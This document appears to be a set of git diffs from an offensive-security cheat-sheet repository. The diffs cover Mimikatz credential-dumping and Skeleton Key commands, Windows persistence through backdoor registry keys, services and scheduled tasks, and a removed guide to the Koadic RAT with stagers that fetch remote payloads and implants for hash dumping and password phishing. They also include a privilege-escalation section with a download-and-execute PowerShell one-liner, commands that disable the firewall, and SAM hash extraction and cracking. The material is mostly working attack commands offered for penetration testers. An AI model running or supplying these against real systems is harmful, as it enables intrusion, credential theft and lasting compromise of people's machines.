 |MISC::Skeleton | Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.|
 |PRIVILEGE::Debug | get debug rights (this or Local System rights is required for many Mimikatz commands).|
 |SEKURLSA::Ekeys | list Kerberos encryption keys|
 |SEKURLSA::Kerberos | List Kerberos credentials for all authenticated users (including services and computer account)|
 |SEKURLSA::Krbtgt | get Domain Kerberos service account (KRBTGT)password data|
 |SEKURLSA::LogonPasswords | lists all available provider credentials. This usually shows recently logged on user and computer credentials.|
 |SEKURLSA::Pth | Pass- theHash and Over-Pass-the-Hash|
 |SEKURLSA::Tickets | Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).|
 |TOKEN::List | list all tokens of the system|
 |TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
 |TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
 ## Powershell Mimikatz
 Mimikatz in memory (no binary on disk) with :
 - [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1) from PowerShellEmpire
 - [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1) from PowerSploit
 More informations can be grabbed from the Memory with :
 - [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
 ## References
 - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
 - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -1,69 +1,40 @@
 # Windows - Persistence
-## Userland
+:warning: Content of this page has been moved to [InternalAllTheThings/redteam/persistence/windows](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/)
-### Registry
+* [Tools](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#tools)
-
+* [Hide Your Binary](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#hide-your-binary)
-Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.
+* [Disable Antivirus and Security](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#disable-antivirus-and-security)
-
+    * [Antivirus Removal](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#antivirus-removal)
-```powershell
+    * [Disable Windows Defender](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#disable-windows-defender)
-Value name:  Backdoor
+    * [Disable Windows Firewall](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#disable-windows-firewall)
-Value data:  C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
+    * [Clear System and Security Logs](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#clear-system-and-security-logs)
-```
+* [Simple User](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#simple-user)
-
+    * [Registry HKCU](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#registry-hkcu)
-### Startup
+    * [Startup](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#startup)
-
+    * [Scheduled Tasks User](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#scheduled-tasks-user)
-Create a batch script in the user startup folder.
+    * [BITS Jobs](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#bits-jobs)
-
+* [Serviceland](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#serviceland)
-```powershell
+    * [IIS](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#iis)
-PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
+    * [Windows Service](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#windows-service)
-start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
+* [Elevated](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#elevated)
-```
+    * [Registry HKLM](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#registry-hklm)
-
+        * [Winlogon Helper DLL](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#)
-### Scheduled Task
+        * [GlobalFlag](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#)
-
+    * [Startup Elevated](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#startup-elevated)
-```powershell
+    * [Services Elevated](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#services-elevated)
-PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
+    * [Scheduled Tasks Elevated](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#scheduled-tasks-elevated)
-PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
+    * [Binary Replacement](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#binary-replacement)
-PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
+        * [Binary Replacement on Windows XP+](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#binary-replacement-on-windows-xp)
-PS C:\> $S = New-ScheduledTaskSettingsSet
+        * [Binary Replacement on Windows 10+](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#binary-replacement-on-windows-10)
-PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
+    * [RDP Backdoor](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#rdp-backdoor)
-PS C:\> Register-ScheduledTask Backdoor -InputObject $D
+        * [utilman.exe](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#utilman.exe)
-```
+        * [sethc.exe](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#sethc.exe)
-
+    * [Remote Desktop Services Shadowing](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#remote-desktop-services-shadowing)
-## Elevated
+    * [Skeleton Key](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#skeleton-key)
-
+    * [Virtual Machines](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#virtual-machines)
-### HKLM
+    * [Windows Subsystem for Linux](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#windows-subsystem-for-linux)
-
+* [Domain](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#domain)
-Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.
+    * [Golden Certificate](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#golden-certificate)
-
+    * [Golden Ticket](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#golden-ticket)
-```powershell
+* [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/#references)
 Value name:  Backdoor
 Value data:  C:\Windows\Temp\backdoor.exe
 ```
 ### Services
 Create a service that will start automatically or on-demand.
 ```powershell
 PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
 ```
 ### Scheduled Tasks
 Scheduled Task to run as SYSTEM, everyday at 9am.
 ```powershell
 PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
 PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
 PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
 PS C:\> $S = New-ScheduledTaskSettingsSet
 PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
 PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ```
 ## References
 * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
 * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -1,123 +0,0 @@
 # Koadic C3 COM Command & Control - JScript RAT
 > Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.
 ## Installation
 ```powershell
 git clone https://github.com/zerosum0x0/koadic
 git submodule init
 git submodule update
 pip2.7 install -r requirements.txt --user
 python2.7 koadic
 ```
 ## Set a listener
 ```powershell
 use stager/js/mshta
 set LHOST 192.168.1.19
 set SRVPORT 4444
 run
 [>] mshta http://192.168.1.19:4444/6DX7f
 ```
 ```powershell
 use stager/js/wmic
 set LHOST 192.168.1.19
 set SRVPORT 4444
 run
 [>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl"
 ```
 ### Stagers
 Stagers hook target zombies and allow you to use implants.
 Module | Description
 --------|------------
 stager/js/mshta | serves payloads using MSHTA.exe HTML Applications
 stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets
 stager/js/wmic | serves payloads using WMIC XSL
 stager/js/rundll32_js | serves payloads using rundll32.exe
 stager/js/disk | serves payloads using files on disk
 ## List zombies and interact with them
 ```powershell
 (koadic: sta/js/wmic)$ zombies
        ID   IP              STATUS  LAST SEEN
        ---  ---------       ------- ------------
        0    192.168.1.30    Alive   2018-10-04 17:07:12
 (koadic: sta/js/wmic)$ zombies 0
        ID:                     0
        Status:                 Alive
        First Seen:             2018-10-04 17:05:00
        Last Seen:              2018-10-04 17:14:42
        IP:                     192.168.1.30
        User:                   DESKTOP-68URA9U\CrashWin
        [...]
        Elevated:               No
        [...]
 ```
 Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`.
 ```powershell
 [koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami
 [*] Zombie 0: Job 1 (implant/manage/exec_cmd) created.
 [+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed.
 Result for `cd C:\Users\CrashWin & whoami`:
 desktop-68ura9u\crashwin
 ```
 ## Use an implant
 Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`.
 ```powershell
 (koadic: sta/js/mshta)$ use implant/phish/password_box
 (koadic: imp/phi/password_box)$ set ZOMBIE 1
 (koadic: imp/phi/password_box)$ run
 Input contents:
 MyStrongPassword123!
 ```
 ### Implants
 Implants start jobs on zombies.
 Module | Description
 --------|------------
 implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
 implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10.
 implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window.
 implant/fun/voice | Plays a message over text-to-speech.
 implant/gather/clipboard | Retrieves the current content of the user clipboard.
 implant/gather/enum_domain_info | Retrieve information about the Windows domain.
 implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive.
 implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file.
 implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X).
 implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
 implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
 implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed).
 implant/manage/enable_rdesktop | Enables remote desktop on the target.
 implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output.
 implant/phishing/password_box | Prompt a user to enter their password.
 implant/pivot/stage_wmi | Hook a zombie on another machine using WMI.
 implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals.
 implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN.
 implant/utils/download_file | Downloads a file from the target zombie.
 implant/utils/multi_module | Run a number of implants in succession.
 implant/utils/upload_file | Uploads a file from the listening server to the target zombies.
 ## References
 - [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/)
 - [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -1,774 +1,68 @@
 # Windows - Privilege Escalation
-## Summary
+:warning: Content of this page has been moved to [InternalAllTheThings/redteam/escalation/windows-privilege-escalation](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/)
-
+
-* [Tools](#tools)
+* [Tools](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#tools)
-* [Windows Version and Configuration](#windows-version-and-configuration)
+* [Windows Version and Configuration](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#windows-version-and-configuration)
-* [User Enumeration](#user-enumeration)
+* [User Enumeration](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#user-enumeration)
-* [Network Enumeration](#network-enumeration)
+* [Network Enumeration](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#network-enumeration)
-* [EoP - Looting for passwords](#eop---looting-for-passwords)
+* [Antivirus Enumeration](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#antivirus-enumeration)
-* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
+* [Default Writeable Folders](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#default-writeable-folders)
-* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
+* [EoP - Looting for passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---looting-for-passwords)
-* [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
+    * [SAM and SYSTEM files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#sam-and-system-files)
-* [EoP - Unquoted Service Paths](#eop---unquoted-service-paths)
+    * [HiveNightmare](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#hivenightmare)
-* [EoP - Kernel Exploitation](#eop---kernel-exploitation)
+    * [LAPS Settings](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#laps-settings)
-* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
+    * [Search for file contents](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#search-for-file-contents)
-* [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
+    * [Search for a file with a certain filename](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#search-for-a-file-with-a-certain-filename)
-* [EoP - Runas](#eop---runas)
+    * [Search the registry for key names and passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#search-the-registry-for-key-names-and-passwords)
-* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
+    * [Passwords in unattend.xml](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#passwords-in-unattendxml)
-  * [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato)
+    * [Wifi passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#wifi-passwords)
-  * [MS08-067 (NetAPI)](#ms08-067-netapi)
+    * [Sticky Notes passwords](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#sticky-notes-passwords)
-  * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
+    * [Passwords stored in services](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#passwords-stored-in-services)
-  * [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003)
+    * [Passwords stored in Key Manager](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#passwords-stored-in-key-manager)
-  * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
+    * [Powershell History](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#powershell-history)
-  * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
+    * [Powershell Transcript](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#powershell-transcript)
-
+    * [Password in Alternate Data Stream](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#password-in-alternate-data-stream)
-## Tools
+* [EoP - Processes Enumeration and Tasks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---processes-enumeration-and-tasks)
-
+* [EoP - Incorrect permissions in services](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---incorrect-permissions-in-services)
- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
+* [EoP - Windows Subsystem for Linux (WSL)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---windows-subsystem-for-linux-wsl)
-    ```powershell
+* [EoP - Unquoted Service Paths](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---unquoted-service-paths)
-    powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
+* [EoP - $PATH Interception](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---path-interception)
-    ```
+* [EoP - Named Pipes](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---named-pipes)
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
+* [EoP - Kernel Exploitation](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---kernel-exploitation)
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
+* [EoP - Microsoft Windows Installer](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---microsoft-windows-installer)
-    ```powershell
+    * [AlwaysInstallElevated](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#alwaysinstallelevated)
-    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1
+    * [CustomActions](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#customactions)
-    ```
+* [EoP - Insecure GUI apps](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---insecure-gui-apps)
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
+* [EoP - Evaluating Vulnerable Drivers](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---evaluating-vulnerable-drivers)
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
+* [EoP - Printers](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---printers)
-    ```powershell
+    * [Universal Printer](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#universal-printer)
-    ./windows-exploit-suggester.py --update
+    * [Bring Your Own Vulnerability](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#bring-your-own-vulnerability)
-    ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt 
+* [EoP - Runas](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---runas)
-    ```
+* [EoP - Abusing Shadow Copies](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---abusing-shadow-copies)
- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
+* [EoP - From local administrator to NT SYSTEM](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---from-local-administrator-to-nt-system)
- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits)
+* [EoP - Living Off The Land Binaries and Scripts](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---living-off-the-land-binaries-and-scripts)
- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
+* [EoP - Impersonation Privileges](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---impersonation-privileges)
- [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt)
+    * [Restore A Service Account's Privileges](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#restore-a-service-accounts-privileges)
- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
+    * [Meterpreter getsystem and alternatives](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#meterpreter-getsystem-and-alternatives)
- [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS)
+    * [RottenPotato (Token Impersonation)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#rottenpotato-token-impersonation)
-    ```powershell
+    * [Juicy Potato (Abusing the golden privileges)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#juicy-potato-abusing-the-golden-privileges)
-    powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
+    * [Rogue Potato (Fake OXID Resolver)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#rogue-potato-fake-oxid-resolver))
-    ```
+    * [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#efspotato-ms-efsr-efsrpcopenfileraw))
-
+    * [PrintSpoofer (Printer Bug)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#PrintSpoofer-Printer-Bug)))
-## Windows Version and Configuration
+* [EoP - Privileged File Write](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---privileged-file-write)
-
+    * [DiagHub](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#diaghub)
-```powershell
+    * [UsoDLLLoader](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#usodllloader)
-systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
+    * [WerTrigger](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#wertrigger)
-```
+    * [WerMgr](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#wermgr)
-
+* [EoP - Privileged File Delete](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---privileged-file-delete)
-Extract patchs and updates
+* [EoP - Common Vulnerabilities and Exposures](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---common-vulnerabilities-and-exposure)
-```powershell
+    * [MS08-067 (NetAPI)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms08-067-netapi)
-wmic qfe
+    * [MS10-015 (KiTrap0D)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
-```
+    * [MS11-080 (adf.sys)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms11-080-afd.sys---microsoft-windows-xp-2003)
-
+    * [MS15-051 (Client Copy Image)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms15-051---microsoft-windows-2003--2008--7--8--2012)
-Architecture
+    * [MS16-032](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
-
+    * [MS17-010 (Eternal Blue)](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#ms17-010-eternal-blue)
-```powershell
+    * [CVE-2019-1388](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#cve-2019-1388)
-wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
+* [EoP - $PATH Interception](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#eop---path-interception)
-```
+* [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/#references)
 List all env variables
 ```powershell
 set
 Get-ChildItem Env: | ft Key,Value
 ```
 List all drives
 ```powershell
 wmic logicaldisk get caption || fsutil fsinfo drives
 wmic logicaldisk get caption,description,providername
 Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
 ```
 ## User Enumeration
 Get current username
 ```powershell
 echo %USERNAME% || whoami
 $env:username
 ```
 List user privilege
 ```powershell
 whoami /priv
 ```
 List all users
 ```powershell
 net user
 whoami /all
 Get-LocalUser | ft Name,Enabled,LastLogon
 Get-ChildItem C:\Users -Force | select Name
 ```
 List logon requirements; useable for bruteforcing
 ```powershell$env:usernadsc
 net accounts
 ```
 Get details about a user (i.e. administrator, admin, current user)
 ```powershell
 net user administrator
 net user admin
 net user %USERNAME%
 ```
 List all local groups
 ```powershell
 net localgroup
 Get-LocalGroup | ft Name
 ```
 Get details about a group (i.e. administrators)
 ```powershell
 net localgroup administrators
 Get-LocalGroupMember Administrators | ft Name, PrincipalSource
 Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
 ```
 ## Network Enumeration
 List all network interfaces, IP, and DNS.
 ```powershell
 ipconfig /all
 Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
 Get-DnsClientServerAddress -AddressFamily IPv4 | ft
 ```
 List current routing table
 ```powershell
 route print
 Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
 ```
 List the ARP table
 ```powershell
 arp -A
 Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
 ```
 List all current connections
 ```powershell
 netstat -ano
 ```
 List firewall state and current configuration
 ```powershell
 netsh advfirewall firewall dump
 or 
 netsh firewall show state
 netsh firewall show config
 ```
 List firewall's blocked ports
 ```powershell
 $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
 ```
 Disable firewall
 ```powershell
 netsh firewall set opmode disable
 netsh advfirewall set allprofiles state off
 ```
 List all network shares
 ```powershell
 net share
 ```
 SNMP Configuration
 ```powershell
 reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
 Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
 ```
 ## EoP - Looting for passwords
 ### SAM and SYSTEM files
 The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.
 ```powershell
 # Usually %SYSTEMROOT% = C:\Windows
 %SYSTEMROOT%\repair\SAM
 %SYSTEMROOT%\System32\config\RegBack\SAM
 %SYSTEMROOT%\System32\config\SAM
 %SYSTEMROOT%\repair\system
 %SYSTEMROOT%\System32\config\SYSTEM
 %SYSTEMROOT%\System32\config\RegBack\system
 ```
 Generate a hash file for John using `pwdump` or `samdump2`.
 ```powershell
 pwdump SYSTEM SAM > /root/sam.txt
 samdump2 SYSTEM SAM -o sam.txt
 ```
 Then crack it with `john -format=NT /root/sam.txt`.
 ### Search for file contents
 ```powershell
 cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
 findstr /si password *.xml *.ini *.txt *.config
 findstr /spin "password" *.*
 ```
 ### Search for a file with a certain filename
 ```powershell
 dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
 where /R C:\ user.txt
 where /R C:\ *.ini
 ```
 ### Search the registry for key names and passwords
 ```powershell
 REG QUERY HKLM /F "password" /t REG_SZ /S /K
 REG QUERY HKCU /F "password" /t REG_SZ /S /K
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
